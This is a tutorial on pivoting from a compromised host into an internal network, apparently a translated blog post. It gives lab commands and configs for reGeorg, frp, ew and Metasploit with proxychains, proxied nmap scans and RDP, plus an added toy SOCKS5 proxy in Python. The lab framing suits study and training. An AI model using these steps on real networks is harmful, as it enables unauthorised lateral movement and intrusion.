Intranet penetration | What it is for, and how to use it skillfully (detailed steps)
0x00 Preface
Intranet penetration (pivoting from a compromised host into its internal network) has always been the focus of post-exploitation, and there are many articles on it. After reading and summarizing them, it took two days to organize this tool-oriented write-up, which aims to let you use intranet penetration with the fewest possible steps. Four commonly used methods are selected: reGeorg, frp, ew and msf+proxychains (enough to cover different intranet environments); frp and ew are tried from both a Linux and a Windows attack machine.
Related software download: https://pan.baidu.com/s/1DvEI0mLEKnwrd3EMUsH1DA (extraction code: 33t6)
Experimental environment: a two-layer network. You can build it yourself, or reply "intranet penetration environment" to the official account to obtain the two download links.
Attack machines (kali and win10): 192.168.211.164 (VMnet8, NAT mode) and 192.168.211.193 (VMnet8, NAT mode)
1 springboard machine (win7): external NIC 192.168.211.224 (VMnet8, NAT mode), internal NIC 192.168.52.143 (VMnet1, host-only mode)
2 internal network machines: 192.168.52.138 (VMnet1, host-only mode) and 192.168.52.141 (VMnet1, host-only mode)
The simple network topology is as follows: [topology diagram]
0x01 reGeorg
1.1 Environment
Attack machine: kali. reGeorg software: https://github.com/sensepost/reGeorg. Required to run it: Python, pip, urllib3.
pip installation:
wget https://bootstrap.pypa.io/get-pip.py
python get-pip.py
urllib3 installation (reGeorg depends on it):
pip install urllib3
1.2 Deployment and configuration
The prerequisite for uploading tunnel.nosocket.php is that you already have access to the springboard machine (every method in this article assumes the springboard has already been compromised, since it is the host that is connected to the intranet). The Windows 7 springboard runs a PHP web server.
Upload tunnel.nosocket.php to the website and visit http://192.168.211.224/tunnel.nosocket.php. The page loads, which confirms the tunnel script is reachable.
Start reGeorg:
python reGeorgSocksProxy.py -p 1080 -u http://192.168.211.224/tunnel.nosocket.php
-p 1080 is the local listening port and -u is the tunnel URL: traffic sent to local port 1080 is forwarded through the specified URL, i.e. through the web server on the springboard.
Configure the proxy: edit the proxychains configuration file /etc/proxychains.conf and set the proxy to port 1080 on this machine:
socks5 127.0.0.1 1080
1.3 Test
Prefix the command with proxychains (the PHP environment on the springboard has been started and index.php exists in its web root):
proxychains curl http://192.168.52.143
The reGeorg console shows the tunnel being established and curl returns the page, which proves the proxied connection to the intranet host works.
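Every tool in this article ends up exposing a SOCKS endpoint that proxychains (or Proxifier on Windows) talks to: reGeorg's listener on 127.0.0.1:1080 here, frp's socks5 plugin and ew's ssocksd/rcsocks in the later sections. The following is an added example and not code from reGeorg, frp or ew: a toy SOCKS5 CONNECT proxy standing in for that endpoint, the client handshake proxychains performs on every connect(), and a port check that does what proxychains nmap -sT -Pn does, one full TCP connect per port, which is the reason only connect scans work through these tunnels. Everything runs on loopback; the echo service started with serve(lambda c: pipe(c, c)) is a constructed stand-in for an intranet host such as 192.168.52.143, and all function and constant names are this example's own.

```python
# Added example (not reGeorg/frp/ew code): a toy SOCKS5 CONNECT proxy, the client side, a connect-scan.
import socket
import struct
import threading

SOCKS_VER, CMD_CONNECT, ATYP_IPV4, ATYP_DOMAIN = 5, 1, 1, 3
REP_OK, REP_UNREACHABLE, REP_REFUSED, REP_CMD_UNSUPPORTED = 0x00, 0x04, 0x05, 0x07
EMPTY_BIND = bytes([0, ATYP_IPV4]) + b"\0" * 6   # RSV + BND.ADDR + BND.PORT, all zero

def recvn(sock, n):
    """Read exactly n bytes; a plain recv() may return a short read."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed mid-handshake")
        buf += chunk
    return buf

def pipe(src, dst):
    """Relay one direction until EOF, then half-close dst so its peer sees EOF too."""
    try:
        while chunk := src.recv(4096):
            dst.sendall(chunk)
        dst.shutdown(socket.SHUT_WR)
    except OSError:
        pass

def handle_socks5(client):
    """One SOCKS5 session: method greeting, CONNECT request, then a two-way relay."""
    try:
        recvn(client, recvn(client, 2)[1])                # VER, NMETHODS, then METHODS
        client.sendall(bytes([SOCKS_VER, 0x00]))          # select 'no authentication'
        _, cmd, _, atyp = recvn(client, 4)                # VER, CMD, RSV, ATYP
        if atyp == ATYP_DOMAIN:                           # name resolves here, not at the client
            host = recvn(client, recvn(client, 1)[0]).decode()
        else:                                             # IPv4 only in this toy, no IPv6
            host = socket.inet_ntoa(recvn(client, 4))
        port = struct.unpack("!H", recvn(client, 2))[0]
        if cmd != CMD_CONNECT:                            # BIND / UDP ASSOCIATE not offered
            client.sendall(bytes([SOCKS_VER, REP_CMD_UNSUPPORTED]) + EMPTY_BIND)
            return
        try:
            remote = socket.create_connection((host, port), timeout=3)
        except OSError as e:                              # refused vs unreachable is what a scan reads
            rep = REP_REFUSED if isinstance(e, ConnectionRefusedError) else REP_UNREACHABLE
            client.sendall(bytes([SOCKS_VER, rep]) + EMPTY_BIND)
            return
        client.sendall(bytes([SOCKS_VER, REP_OK]) + EMPTY_BIND)
        threading.Thread(target=pipe, args=(remote, client), daemon=True).start()
        pipe(client, remote)
    finally:
        client.close()

def serve(handler):
    """Listen on an ephemeral loopback port, hand each connection to a thread, return the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)
    def loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handler, args=(conn,), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]

def free_port():  # a loopback port nothing listens on: bind an ephemeral one, read it, release it
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]

def socks5_connect(proxy, dest, timeout=3):
    """Connect to dest=(host, port) through proxy=(host, port); return (reply code, socket or None)."""
    s = socket.create_connection(proxy, timeout=timeout)
    s.sendall(bytes([SOCKS_VER, 1, 0x00]))                # offer only 'no authentication'
    if recvn(s, 2) != bytes([SOCKS_VER, 0x00]):
        raise RuntimeError("proxy rejected the no-auth method")
    host, port = dest
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:                                       # not a dotted quad: let the proxy resolve it
        addr = bytes([ATYP_DOMAIN, len(host)]) + host.encode()
    s.sendall(bytes([SOCKS_VER, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port))
    rep, atyp = recvn(s, 4)[1::2]                         # VER, REP, RSV, ATYP -> REP, ATYP
    bind_len = recvn(s, 1)[0] if atyp == ATYP_DOMAIN else 4 if atyp == ATYP_IPV4 else 16
    recvn(s, bind_len + 2)                                # drain BND.ADDR + BND.PORT
    if rep != REP_OK:
        s.close()
        return rep, None
    return rep, s

def socks_connect_scan(proxy, host, ports):
    """What proxychains nmap -sT -Pn amounts to: one full TCP connect per port, no ping, no SYN."""
    open_ports = []
    for p in ports:
        rep, s = socks5_connect(proxy, (host, p))
        if rep == REP_OK:
            open_ports.append(p)
            s.close()
    return open_ports
```

To try it by hand: proxy = ("127.0.0.1", serve(handle_socks5)) starts the stand-in SOCKS server, target = serve(lambda c: pipe(c, c)) starts the echo host, socks5_connect(proxy, ("127.0.0.1", target)) returns (REP_OK, sock) and whatever you send on sock comes back, a closed port yields (REP_REFUSED, None), and socks_connect_scan(proxy, "127.0.0.1", [free_port(), target]) returns [target]. The reply code is the only thing a proxied scanner ever sees, which is why nmap needs -sT (so it uses connect()) and -Pn (so it does not try ICMP or ARP first, neither of which proxychains can redirect).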
0x02 frp
Software: frp_0.33.0_windows_amd64 and frp_0.34.1_linux_amd64. Proxy tools: Proxifier or SocksCap64 on Windows; proxychains on Linux.
Note that with only bind_port set, frps accepts a registration from any frpc that can reach port 7000. If the server side is reachable from networks you do not control, set frp's token option in the [common] section of both frps.ini and frpc.ini so that only your own client can open tunnels.
2.1 Attack machine on Windows: frp reverse proxy
Attack machine (server): frps.ini
[common]
bind_port = 7000
then run:
frps.exe -c frps.ini
Springboard machine (client): frpc.ini
[common]
server_addr = 192.168.211.193
server_port = 7000
[http_proxy]
type = tcp
remote_port = 8010
plugin = socks5
then run:
frpc.exe -c frpc.ini
With plugin = socks5, frpc runs a SOCKS5 server inside its own process on the springboard, and frps exposes it on remote_port 8010 of the attack machine; every connection made to 8010 is carried back over the frp tunnel and leaves from the springboard's network, which is what gives the attacker a foothold on the 52 segment.
On the attack machine, open Proxifier and add a SOCKS5 proxy server pointing at 127.0.0.1, port 8010 (the port frps is listening on).
Click Check: the Proxifier check succeeds. Browser access to 192.168.52.143 succeeds.
Test remote desktop to 192.168.52.143 and 192.168.52.141 (remote desktop has been enabled on both machines): both succeed.
frp forward proxy: the attack machine is now the client. frpc.ini:
[common]
server_addr = 192.168.211.224
server_port = 7000
[http_proxy]
type = tcp
remote_port = 8010
plugin = socks5
Execute frpc.exe -c frpc.ini. The springboard is the server side, frps.ini:
[common]
bind_port = 7000
Execute frps.exe -c frps.ini.
Run Proxifier on the attack machine (the client), add a proxy server with address 192.168.211.214 (as written in the original; the springboard's external NIC is listed as 192.168.211.224 in the environment section), port 8010, and connect.
Note what this arrangement actually builds: plugin = socks5 runs the SOCKS5 server inside frpc, which is now on the attack machine, so a connection to port 8010 on the springboard is tunnelled back to the attacker and leaves from the attacker's own network. The springboard's external address is reachable that way, but nothing on the 192.168.52.0/24 segment is, which explains the result below.
I don't know why, but connecting to the springboard's internal network address 192.168.52.143 failed, while connecting to the springboard's external NIC 192.168.211.214 succeeded. I also searched a lot for frp forward proxies online; it seems there are not many of them. After trying this, I still stick with frp as a reverse proxy.
2.2 Attack machine on kali: frp reverse proxy
Server, the attack machine: frps.ini
[common]
bind_port = 7000
Execute:
./frps -c frps.ini
Client, the springboard: frpc.ini
[common]
server_addr = 192.168.211.193
server_port = 7000
[http_proxy]
type = tcp
#remote_port = 8010
remote_port = 1080
plugin = socks5
Execute:
frpc.exe -c frpc.ini
Configure the proxychains configuration file /etc/proxychains.conf (as root) and set the proxy to port 1080 on this machine. The frp socks5 plugin speaks SOCKS5, so the entry is:
socks5 127.0.0.1 1080
Then prefix commands with proxychains. Test:
proxychains curl http://192.168.52.143
proxychains rdesktop 192.168.52.141 (remote desktop to an intranet machine) proves the proxy works. Running nmap through the proxy:
proxychains nmap -p 1-1000 -Pn -sT 192.168.52.141
Scan live hosts and open ports across the C segment:
proxychains nmap -p 1-65535 -Pn -sT 192.168.52.0/24
-sT and -Pn are not optional here: proxychains only intercepts TCP connect() calls, so SYN scans and ICMP or ARP host discovery bypass the proxy entirely and tell you nothing about the intranet.
Summary of frp's advantages and disadvantages. Advantages: with the reverse proxy you only need to forward the intranet host and port you want to access, which is faster.
Disadvantages: configuration is relatively complex when accessing HTTPS websites.
0x03 ew
3.1 Attack machine on Windows 10
ew forward proxy: 1. On the springboard (win7), after uploading ew_for_Win.exe, start a SOCKS server:
ew_for_Win.exe -s ssocksd -l 888
-l is the port ew listens on locally, i.e. on the springboard. On the win10 attack machine, point Proxifier at the springboard's port 888.
Test HTTP: access to http://192.168.52.143/ succeeds.
Test remote desktop: 192.168.52.141 succeeds.
ew reverse proxy. The attack machine executes:
ew_for_Win.exe -s rcsocks -l 1080 -e 1234
This forwards connections arriving on the transit port 1234 (-e) to local port 1080 (-l); 1080 is then used as the SOCKS5 port. Next, on the edge (springboard) machine execute:
ew_for_Win.exe -s rssocks -d 192.168.211.164 -e 1234
-d specifies the host to connect back to (here the attack machine; in a real engagement the public IP of your VPS) and -e the transit port opened there.
In Proxifier on the attack machine, set the proxy server to 127.0.0.1, port 1080.
Test HTTP: access to http://192.168.52.143/ succeeds.
Test remote desktop: 192.168.52.141 succeeds.
3.2 Attack machine on Kali
ew reverse proxy. Server side, the attack machine (kali), executes:
./ew_for_linux64 -s rcsocks -l 1080 -e 1024
Client side, the springboard, executes:
ew_for_Win.exe -s rssocks -d 192.168.211.193 -e 1024
Configure proxychains: in /etc/proxychains.conf (as root) set the proxy to port 1080 on this machine:
socks5 127.0.0.1 1080
Test: first run curl http://192.168.211.219/index.php without proxychains to prove the network is reachable. Then execute:
proxychains curl http://192.168.52.143/index.php
A successful response verifies that the proxy reaches the intranet. Then run nmap through the proxy:
proxychains nmap -p 1-1000 -Pn -sT 192.168.52.141
ew forward proxy. Server side, the springboard, executes:
ew_for_Win.exe -s ssocksd -l 1080
Client side, the kali attack machine, configures proxychains: in /etc/proxychains.conf (as root) set the proxy to the springboard's IP address and port 1080, e.g. socks5 192.168.211.224 1080 for the external NIC listed in the environment section.
Test: execute proxychains curl http://192.168.211.219/index.php; a response proves the proxy works.
The following steps test nmap under proxy conditions. Scan for live intranet hosts:
proxychains nmap -PS 192.168.211.1/24
Note: this scan is fast without the proxy and slow through it. It is also of limited value: when nmap runs as root, -PS sends raw SYN packets that proxychains cannot redirect, so those probes never traverse the tunnel; treat a connect scan with -Pn against a short port list as your host discovery instead.
No-ping scan:
proxychains nmap -P0 192.168.52.0/24
(-P0 is the older spelling of -Pn.)
Scan open ports:
proxychains nmap -p 1-1000 -Pn -sT 192.168.52.141
Summary of ew's advantages and disadvantages
Advantages: simple configuration, equivalent to being directly inside the target intranet. Disadvantages: slow, unstable.
0x04 msf+proxychains
Use msf to obtain access to the springboard machine (how to obtain it is not described here; it was done with msf's built-in attack modules).
(1) Add an intranet route. The purpose is to let the other msf modules reach the other hosts in the intranet: attack traffic for the 52 segment is carried through the meterpreter session on the compromised springboard. (Note: add the route before starting the proxy, because the proxy relies on the routing.) Use arp -a to view the current ARP cache of all interfaces; the entries on the 192.168.52.0/24 segment show which intranet hosts the springboard already talks to and which subnet the route must cover.
(2) Add a SOCKS proxy. The purpose of adding a socks4a proxy is to make it convenient for other software to reach services on the other intranet hosts. Once it is running, prefix other programs with proxychains, configured the same way as reGeorg + SOCKS in 0x01 (see that section; the proxychains entry uses socks4 and the port the msf module listens on).
The proxied request succeeds, which proves the proxy works.